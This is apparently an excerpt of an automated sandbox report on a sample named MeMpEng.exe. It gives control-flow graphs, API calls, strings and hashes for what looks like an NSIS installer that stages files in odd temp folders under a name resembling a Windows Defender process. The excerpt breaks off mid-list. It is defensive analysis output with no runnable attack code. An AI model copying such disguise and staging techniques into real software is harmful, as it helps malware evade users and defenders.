                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 121052019-0
                                                          • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                          • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                                          • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                          • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 403c26-403c3e call 406948 312 403c40-403c50 call 40649b 309->312 313 403c52-403c89 call 406422 309->313 321 403cac-403cd5 call 403efc call 405f2b 312->321 317 403ca1-403ca7 lstrcatW 313->317 318 403c8b-403c9c call 406422 313->318 317->321 318->317 327 403d67-403d6f call 405f2b 321->327 328 403cdb-403ce0 321->328 334 403d71-403d78 call 406591 327->334 335 403d7d-403da2 LoadImageW 327->335 328->327 329 403ce6-403d0e call 406422 328->329 329->327 338 403d10-403d14 329->338 334->335 336 403e23-403e2b call 40140b 335->336 337 403da4-403dd4 RegisterClassW 335->337 351 403e35-403e40 call 403efc 336->351 352 403e2d-403e30 336->352 340 403ef2 337->340 341 403dda-403e1e SystemParametersInfoW CreateWindowExW 337->341 343 403d26-403d32 lstrlenW 338->343 344 403d16-403d23 call 405e50 338->344 349 403ef4-403efb 340->349 341->336 345 403d34-403d42 lstrcmpiW 343->345 346 403d5a-403d62 call 405e23 call 406554 343->346 344->343 345->346 350 403d44-403d4e GetFileAttributesW 345->350 346->327 355 403d50-403d52 350->355 356 403d54-403d55 call 405e6f 350->356 362 403e46-403e60 ShowWindow call 4068d8 351->362 363 403ec9-403eca call 4056ac 351->363 352->349 355->346 355->356 356->346 370 403e62-403e67 call 4068d8 362->370 371 403e6c-403e7e GetClassInfoW 362->371 366 403ecf-403ed1 363->366 368 403ed3-403ed9 366->368 369 403eeb-403eed call 40140b 366->369 368->352 372 403edf-403ee6 call 40140b 368->372 369->340 370->371 375 403e80-403e90 GetClassInfoW RegisterClassW 371->375 376 403e96-403eb9 DialogBoxParamW call 40140b 371->376 372->352 375->376 379 403ebe-403ec7 call 403b76 376->379 379->349
                                                          APIs
                                                            • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                                            • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406975
                                                          • lstrcatW.KERNEL32 ref: 00403CA7
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,7570D4C4), ref: 00403D27
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                                          • LoadImageW.USER32 ref: 00403D8E
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                                          • SystemParametersInfoW.USER32 ref: 00403DE3
                                                          • CreateWindowExW.USER32 ref: 00403E18
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                                          • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                                          • RegisterClassW.USER32(007A7200), ref: 00403E90
                                                          • DialogBoxParamW.USER32 ref: 00403EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-3158641114
                                                          • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                          • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                                          • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                          • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034d1 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 4034e7 call 4034d1 402->405 406 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 402->406 403->388 405->403 433 403244-40324a 405->433 406->403 431 403289-40329a 406->431 409->403 415 4031e2-4031e6 410->415 416 403168-40317c call 405fff 410->416 420 4031f0-4031f6 415->420 421 4031e8-4031ef call 40303e 415->421 416->420 430 40317e-403185 416->430 427 403205-40320d 420->427 428 4031f8-403202 call 406a35 420->428 421->420 427->398 432 403213 427->432 428->427 430->420 436 403187-40318e 430->436 437 4032a2-4032a7 431->437 438 40329c 431->438 432->396 433->403 433->406 436->420 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->420 441 403199-4031a0 439->441 440->440 442 4032b0-4032cb SetFilePointer call 405fff 440->442 441->420 443 4031a2-4031c2 441->443 446 4032d0 442->446 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->420 449 4031de-4031e0 447->449 448->432 448->447 449->420
                                                          APIs
                                                          • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\MeMpEng.exe,00000400), ref: 004030CF
                                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\MeMpEng.exe,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\MeMpEng.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-3088459453
                                                          • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                          • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                                          • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                          • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 450 406591-40659a 451 40659c-4065ab 450->451 452 4065ad-4065c7 450->452 451->452 453 4067d7-4067dd 452->453 454 4065cd-4065d9 452->454 456 4067e3-4067f0 453->456 457 4065eb-4065f8 453->457 454->453 455 4065df-4065e6 454->455 455->453 458 4067f2-4067f7 call 406554 456->458 459 4067fc-4067ff 456->459 457->456 460 4065fe-406607 457->460 458->459 462 4067c4 460->462 463 40660d-406650 460->463 466 4067d2-4067d5 462->466 467 4067c6-4067d0 462->467 464 406656-406662 463->464 465 406768-40676c 463->465 468 406664 464->468 469 40666c-40666e 464->469 470 4067a0-4067a4 465->470 471 40676e-406775 465->471 466->453 467->453 468->469 474 406670-40668e call 406422 469->474 475 4066a8-4066ab 469->475 476 4067b4-4067c2 lstrlenW 470->476 477 4067a6-4067af call 406591 470->477 472 406785-406791 call 406554 471->472 473 406777-406783 call 40649b 471->473 485 406796-40679c 472->485 473->485 486 406693-406696 474->486 482 4066ad-4066b9 GetSystemDirectoryW 475->482 483 4066be-4066c1 475->483 476->453 477->476 487 40674b-40674e 482->487 488 4066d3-4066d7 483->488 489 4066c3-4066cf GetWindowsDirectoryW 483->489 485->476 490 40679e 485->490 491 406750-406753 486->491 492 40669c-4066a3 call 406591 486->492 487->491 493 406760-406766 call 406802 487->493 488->487 494 4066d9-4066f7 488->494 489->488 490->493 491->493 496 406755-40675b lstrcatW 491->496 492->487 493->476 498 4066f9-406709 SHGetFolderPathW 494->498 499 40670b-406723 call 406948 494->499 496->493 498->499 500 406745-406749 498->500 506 406725-406738 SHGetPathFromIDListW CoTaskMemFree 499->506 507 40673a-406743 499->507 500->487 506->500 506->507 507->494 507->500
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,?,?,00000000,00000000,0079A700,756F110C), ref: 004066C9
                                                          • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,Call), ref: 00406705
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406730
                                                          • lstrcatW.KERNEL32 ref: 0040675B
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,?,?,00000000,00000000,0079A700,756F110C), ref: 004067B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPath$FolderFreeFromListSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 2237929815-4250899300
                                                          • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                          • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                                          • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                          • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 572 401794-4017b9 call 402dcb call 405e9a 577 4017c3-4017d5 call 406554 call 405e23 lstrcatW 572->577 578 4017bb-4017c1 call 406554 572->578 583 4017da-4017db call 406802 577->583 578->583 587 4017e0-4017e4 583->587 588 4017e6-4017f0 call 4068b1 587->588 589 401817-40181a 587->589 597 401802-401814 588->597 598 4017f2-401800 CompareFileTime 588->598 590 401822-40183e call 406044 589->590 591 40181c-40181d call 40601f 589->591 599 401840-401843 590->599 600 4018b2-4018db call 4055d9 call 4032d9 590->600 591->590 597->589 598->597 601 401894-401899 call 4055d9 599->601 602 401845-401883 call 406554 * 2 call 406591 call 406554 call 405bb4 599->602 614 4018e3-4018ef SetFileTime 600->614 615 4018dd-4018e1 600->615 607 40189e 601->607 602->587 634 401889-40188a 602->634 612 4018a7-4018ad 607->612 617 402c58 612->617 616 4018f5-401900 CloseHandle 614->616 615->614 615->616 619 401906-401909 616->619 620 402c4f-402c52 616->620 622 402c5a-402c5e 617->622 623 40190b-40191c call 406591 lstrcatW 619->623 624 40191e-401921 call 406591 619->624 620->617 630 401926-4023bd 623->630 624->630 635 4023c2-4023c7 630->635 636 4023bd call 405bb4 630->636 634->612 637 40188c-40188d 634->637 635->622 636->635 637->601
                                                          APIs
                                                          • lstrcatW.KERNEL32 ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive$C:\Users\user\AppData\Local\Temp\nsn59E.tmp$C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll$Call
                                                          • API String ID: 1941528284-2440072435
                                                          • Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                                          • Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
                                                          • Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                                          • Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 638 4055d9-4055ee 639 4055f4-405605 638->639 640 4056a5-4056a9 638->640 641 405610-40561c lstrlenW 639->641 642 405607-40560b call 406591 639->642 644 405639-40563d 641->644 645 40561e-40562e lstrlenW 641->645 642->641 647 40564c-405650 644->647 648 40563f-405646 SetWindowTextW 644->648 645->640 646 405630-405634 lstrcatW 645->646 646->644 649 405652-405694 SendMessageW * 3 647->649 650 405696-405698 647->650 648->647 649->650 650->640 651 40569a-40569d 650->651 651->640
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                          • lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                          • lstrcatW.KERNEL32 ref: 00405634
                                                          • SetWindowTextW.USER32 ref: 00405646
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll
                                                          • API String ID: 2531174081-426702764
                                                          • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                          • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                                          • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                          • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 652 4032d9-4032f0 653 4032f2 652->653 654 4032f9-403302 652->654 653->654 655 403304 654->655 656 40330b-403310 654->656 655->656 657 403320-40332d call 4034d1 656->657 658 403312-40331b call 4034e7 656->658 662 403333-403337 657->662 663 4034bf 657->663 658->657 664 40346a-40346c 662->664 665 40333d-403363 GetTickCount 662->665 666 4034c1-4034c2 663->666 667 4034ac-4034af 664->667 668 40346e-403471 664->668 669 4034c7 665->669 670 403369-403371 665->670 671 4034ca-4034ce 666->671 672 4034b1 667->672 673 4034b4-4034bd call 4034d1 667->673 668->669 674 403473 668->674 669->671 675 403373 670->675 676 403376-403384 call 4034d1 670->676 672->673 673->663 684 4034c4 673->684 678 403476-40347c 674->678 675->676 676->663 686 40338a-403393 676->686 681 403480-40348e call 4034d1 678->681 682 40347e 678->682 681->663 690 403490-40349c call 4060f6 681->690 682->681 684->669 688 403399-4033b9 call 406aa3 686->688 693 403462-403464 688->693 694 4033bf-4033d2 GetTickCount 688->694 696 403466-403468 690->696 697 40349e-4034a8 690->697 693->666 698 4033d4-4033dc 694->698 699 40341d-40341f 694->699 696->666 697->678 700 4034aa 697->700 701 4033e4-403415 MulDiv wsprintfW call 4055d9 698->701 702 4033de-4033e2 698->702 703 403421-403425 699->703 704 403456-40345a 699->704 700->669 709 40341a 701->709 702->699 702->701 707 403427-40342e call 4060f6 703->707 708 40343c-403447 703->708 704->670 705 403460 704->705 705->669 713 403433-403435 707->713 711 40344a-40344e 708->711 709->699 711->688 712 403454 711->712 712->669 713->696 714 403437-40343a 713->714 714->711
                                                          APIs
                                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403343
                                                          • GetTickCount.KERNEL32(STy,00793700,00004000), ref: 004033C7
                                                          • MulDiv.KERNEL32 ref: 004033F0
                                                          • wsprintfW.USER32 ref: 00403403
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
